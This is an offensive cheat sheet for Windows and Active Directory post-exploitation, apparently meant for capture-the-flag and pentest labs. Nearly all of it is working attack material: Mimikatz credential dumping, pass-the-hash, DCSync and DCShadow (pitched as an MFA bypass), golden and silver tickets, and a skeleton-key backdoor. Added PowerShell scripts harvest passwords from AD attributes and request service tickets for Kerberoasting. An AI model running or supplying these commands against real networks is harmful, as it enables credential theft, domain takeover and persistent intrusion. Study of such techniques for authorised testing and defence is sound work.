Exfiltration

Don't miss any data.

Catch the Flag

Windows

dir "\proof*.txt" /s

PS> gci -Recurse -Include FILENAME* -ErrorAction SilentlyContinue

Linux

find / -type f -iname "flag.txt" 2>/dev/null
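
The `dir` and `gci` one-liners above only walk the current drive. The following is an added example (not from the original cheat sheet) that searches every mounted filesystem drive for the usual proof/flag file names and prints each hit with owner, timestamp and content, so a second volume or a mounted share is not overlooked. The file-name patterns are assumptions; adjust them to the engagement.

```powershell
# Added example: hunt proof/flag files on all filesystem drives, not just the current one.
# The pattern list is an assumption; extend it for the target environment.
$patterns = 'proof*.txt', 'flag*.txt', 'local.txt', 'root.txt', 'user.txt'

# Every drive the FileSystem provider knows about that actually has media
$drives = Get-PSDrive -PSProvider FileSystem | Where-Object { $_.Used -gt 0 }

$results = foreach ($d in $drives) {
    # -Force includes hidden/system files; -Include only applies together with -Recurse
    Get-ChildItem -Path $d.Root -Recurse -Force -Include $patterns -File `
                  -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text = Get-Content -Path $_.FullName -Raw -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Path     = $_.FullName
                Owner    = (Get-Acl -Path $_.FullName -ErrorAction SilentlyContinue).Owner
                Modified = $_.LastWriteTime
                Content  = if ($text) { $text.Trim() } else { '<unreadable or empty>' }
            }
        }
}

$results | Format-List
```

Owner and LastWriteTime are worth recording in the report: they show which account dropped the file and when, which is often asked for alongside the flag itself.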

Dump Active Directory with PS

# find accounts whose description field mentions a password (needs the RSAT ActiveDirectory module)
[PS] Import-Module ActiveDirectory
[PS] Get-ADObject -LDAPFilter "(&(objectClass=user)(description=*pass*))" -Properties * | Select-Object SAMAccountName, Description, DistinguishedName
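
The query above only looks at `description` for the string "pass". The following is an added example (not from the original cheat sheet) that generalises it: one LDAP query over the attributes that most often leak secrets (`description`, `info`, `comment`, and the `userPassword` / `unixUserPassword` attributes, which are stored as byte arrays and are readable by Authenticated Users in many domains), with the values decoded for display. It assumes the RSAT ActiveDirectory module and a domain user context; the attribute list and the `pass`/`pwd` search terms are assumptions.

```powershell
# Added example: hunt credentials left in AD attributes (computers are covered too,
# since objectClass=computer derives from objectClass=user).
Import-Module ActiveDirectory

# Attributes to inspect; the list is an assumption, extend it as needed
$attrs = 'description', 'info', 'comment', 'userPassword', 'unixUserPassword'

# One LDAP filter: any object whose text attributes mention pass/pwd,
# or that has a value in one of the clear-text password attributes
$filter = '(&(objectClass=user)(|' +
          '(description=*pass*)(description=*pwd*)(info=*pass*)(comment=*pass*)' +
          '(userPassword=*)(unixUserPassword=*)))'

Get-ADObject -LDAPFilter $filter -Properties ($attrs + 'sAMAccountName') |
    ForEach-Object {
        $o = $_
        foreach ($a in $attrs) {
            $raw = $o.$a
            if (-not $raw) { continue }
            # A single byte[] must not be enumerated byte by byte; wrap it in a one-element array.
            $vals = if ($raw -is [byte[]]) { ,$raw } else { @($raw) }
            foreach ($item in $vals) {
                # userPassword/unixUserPassword come back as byte arrays: decode for display
                if ($item -is [byte[]]) { $item = [Text.Encoding]::UTF8.GetString($item) }
                [pscustomobject]@{
                    Account   = $o.sAMAccountName
                    Attribute = $a
                    Value     = [string]$item
                    DN        = $o.DistinguishedName
                }
            }
        }
    } | Format-Table -AutoSize
```

Anything returned from `userPassword` / `unixUserPassword` is a clear-text credential, not a hash; the `description` hits still need a human look, since "pass" also matches words like "passport".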

Dump with Mimikatz

ref: https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz

cheatsheet: https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49

copy from: https://kashz.gitbook.io/kashz-jewels/cheatsheet/mimikatz

[Important to start first] Test Mimikatz

privilege::debug
# Privilege '20' OK => working properly (needs a local admin token with SeDebugPrivilege;
# "RtlAdjustPrivilege (20) c0000061" means the shell is not elevated)

Password / hashes

# dump credentials of logged-on users: NTLM hashes, and plaintext where WDigest is still enabled
sekurlsa::logonpasswords

# dump local SAM hashes and LSA secrets / cached domain creds (both need SYSTEM: run token::elevate first)
lsadump::sam
lsadump::lsa [/inject | /patch]
# crack NTLM with: hashcat -m 1000 <hash>

Escalate privilege using NTLM Hash (pass-the-hash)

ref: https://www.youtube.com/watch?v=NeY7OiQTRK8

# take the Administrator NTLM hash from `sekurlsa::logonpasswords`, then spawn a cmd whose
# network authentication uses that hash (the local token is unchanged, only remote access is affected)
sekurlsa::pth /user:Administrator /domain:lab.local /ntlm:<ntlm hash> /run:cmd

DCsync (Privilege Escalation AD)

[requirement] the account must hold these extended rights on the domain object (by default only Administrators, Domain Controllers and Enterprise Domain Controllers do):

  • Replicating Directory Changes

  • Replicating Directory Changes All

lsadump::dcsync /user:krbtgt
lsadump::dcsync /user:administrator
# token::elevate impersonates the SYSTEM token; lsadump::sam / lsadump::lsa need it, dcsync does not
# (it only needs the replication rights above). Handy in an evil-winrm shell that is not running as SYSTEM.
token::elevate
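
Before trying dcsync it is worth checking which principals actually hold the two replication rights, both to know whether the account you own qualifies and to spot an existing backdoor. The following is an added example (not from the original cheat sheet) that reads the ACL of the domain naming context through the `AD:` PSDrive and lists every principal allowed the relevant extended rights. It assumes the RSAT ActiveDirectory module; the GUIDs are the fixed schema identifiers of the extended rights.

```powershell
# Added example: who can DCSync? Lists principals with the replication extended rights
# (or GenericAll / all extended rights, which include them) on the domain object.
Import-Module ActiveDirectory

# Schema GUIDs of the relevant extended rights (fixed values in every AD forest)
$rights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
$allZeroGuid = '00000000-0000-0000-0000-000000000000'   # ACE applies to all rights/objects

$domainDN = (Get-ADDomain).DistinguishedName
$acl      = Get-Acl -Path "AD:\$domainDN"

$acl.Access |
    Where-Object {
        $guid = $_.ObjectType.ToString()
        $_.AccessControlType -eq 'Allow' -and
        $_.ActiveDirectoryRights -match 'ExtendedRight|GenericAll' -and
        ($rights.ContainsKey($guid) -or $guid -eq $allZeroGuid)
    } |
    ForEach-Object {
        $guid = $_.ObjectType.ToString()
        [pscustomobject]@{
            Principal = $_.IdentityReference.Value
            Right     = if ($rights.ContainsKey($guid)) { $rights[$guid] } else { 'All extended rights / GenericAll' }
        }
    } |
    Group-Object -Property Principal |
    Select-Object @{ n = 'Principal'; e = { $_.Name } },
                  @{ n = 'Rights';    e = { ($_.Group.Right | Sort-Object -Unique) -join ', ' } }
```

In a stock domain the output is limited to SYSTEM, BUILTIN\Administrators, Domain Controllers, Enterprise Domain Controllers and Enterprise Read-only Domain Controllers (filtered set only). Any other principal is either a legitimate sync product (Azure AD Connect, for example) or a dcsync path; a user with only Get-Changes but not Get-Changes-All cannot pull secrets.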

DCshadow

# simple PoC: stage an attribute change (the push from a Domain Admin session is described below)
lsadump::dcshadow /object:CN=administrator,CN=users,DC=hackers,DC=local /attribute:description /value:"modified dcshadow"

Attack DCshadow and DCsync (persistence domain admin / AD Attribute Takeover)

https://www.elladodelmal.com/2018/03/dcshadow-y-dcsync-enganando-al-domain.html

Use case:

  • Bypass MFA (e.g. by rewriting an attribute such as telephoneNumber that the MFA product reads from AD, as in the example below)

# stage the attribute change from a mimikatz running as SYSTEM (this registers the rogue DC and waits for the push)
token::elevate
lsadump::dcshadow /object:CN=administrator,CN=users,DC=hackers,DC=local /attribute:telephoneNumber /value:"123-123-223"

# from a second mimikatz shell running as a Domain Admin, push the change to the real DCs
lsadump::dcshadow /push

Golden / Silver Ticket

# dump the NTLM hash of the account (krbtgt for golden, service account for silver) and the domain SID
lsadump::lsa /inject /name:[krbtgt | DOMAIN_ADMIN_ACCOUNT | SERVICE_ACCOUNT]

# create golden ticket and pass-the-ticket (RID 500 = built-in Administrator)
kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_NTLM_HASH /id:500 /ptt
# create silver ticket for one service on one host and pass-the-ticket
# (signed with the service account's hash, so the DC is never contacted)
kerberos::golden /user:<USER> /domain:DOMAIN /sid:SID /target:SERVER.DOMAIN /service:cifs /rc4:SERVICE_NTLM_HASH /id:1103 /ptt

# check: open a cmd that inherits the injected ticket, then use the hostname (an IP falls back to NTLM and ignores the ticket)
misc::cmd
dir \\SERVER.DOMAIN\c$
PsExec.exe \\SERVER.DOMAIN cmd.exe



# Kerberoasting attack
# ref: https://www.netwrix.com/cracking_kerberos_tgs_tickets_using_kerberoasting.html
# request a TGS for each SPN account first (the cache only holds tickets that were already requested), then export them
kerberos::list /export
# the .kirbi files land in mimikatz's current directory; copy them off and crack with tgsrepcrack.py
# (or convert with kirbi2john and use hashcat -m 13100 for RC4 tickets)
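
`kerberos::list /export` only writes out tickets that are already in the logon session's cache, so the service tickets have to be requested first. The following is an added example (not from the original cheat sheet) that enumerates every enabled user account with an SPN and requests one TGS per account through `KerberosRequestorSecurityToken`, which makes the ticket land in the cache without any special tooling. It also reports whether the account advertises AES, since that decides whether the exported ticket is RC4 (hashcat -m 13100) or AES (-m 19600/19700) and how realistic cracking is. It assumes Windows PowerShell 5.1 (the `System.IdentityModel` assembly is not available on PowerShell 7) and the RSAT ActiveDirectory module.

```powershell
# Added example: request a TGS for every SPN-bearing user so `kerberos::list /export`
# (or klist) has something to export. Run as any domain user.
Import-Module ActiveDirectory
Add-Type -AssemblyName System.IdentityModel

# Service accounts with an SPN; krbtgt is skipped (its tickets are TGTs, not roastable TGS)
$spnUsers = Get-ADUser -Filter { ServicePrincipalName -like '*' -and Enabled -eq $true } `
                       -Properties ServicePrincipalName, 'msDS-SupportedEncryptionTypes' |
            Where-Object { $_.SamAccountName -ne 'krbtgt' }

$report = foreach ($u in $spnUsers) {
    # All SPNs on one account share the same key, so one ticket per account is enough to crack
    $spn = $u.ServicePrincipalName | Select-Object -First 1

    # msDS-SupportedEncryptionTypes bits: 0x4 RC4, 0x8 AES128, 0x10 AES256; absent => RC4 for user accounts
    $etypes = [int]($u.'msDS-SupportedEncryptionTypes')
    $aes    = ($etypes -band 0x18) -ne 0

    try {
        # Asking for the token makes the client fetch the TGS from the KDC into the ticket cache
        $null = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn
        $status = 'requested'
    } catch {
        $status = "failed: $($_.Exception.Message)"
    }

    [pscustomobject]@{
        Account      = $u.SamAccountName
        SPN          = $spn
        AESAdvertised = $aes
        HashcatMode  = if ($aes) { '19600 / 19700' } else { '13100' }
        Status       = $status
    }
}

$report | Format-Table -AutoSize
# now run `kerberos::list /export` in mimikatz (same logon session) and collect the .kirbi files
```

Prioritise the RC4 tickets and accounts whose `PasswordLastSet` is old; an AES256 ticket for a machine account or a gMSA is effectively uncrackable and just adds noise to the hashcat run.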

Kerberos Skeleton key

Patches LSASS on a domain controller (run mimikatz there with privilege::debug) so that every domain account additionally accepts the master password "mimikatz"; the real passwords keep working, so users notice nothing.

note: the patch lives only in memory, a reboot of the DC removes it. LSA Protection (RunAsPPL) blocks it unless the protection is stripped first.

misc::skeleton

# done, now access admin shares with the master password
> net use \\DOMAIN-CONTROLLER\admin$ /user:DOMAIN\Administrator mimikatz
> net use \\Desktop-1\c$ /user:DOMAIN\Machine1 mimikatz
> dir \\Desktop-1\c$

Get DNS zone files

# on a DNS server the zone files live under C:\Windows\System32\dns as <DOMAIN>.dns
cd C:\Windows
PS> gci -Recurse -Include <DOMAIN>* -ErrorAction SilentlyContinue

Online request catcher (for callback and exfil tests): https://beeceptor.com/
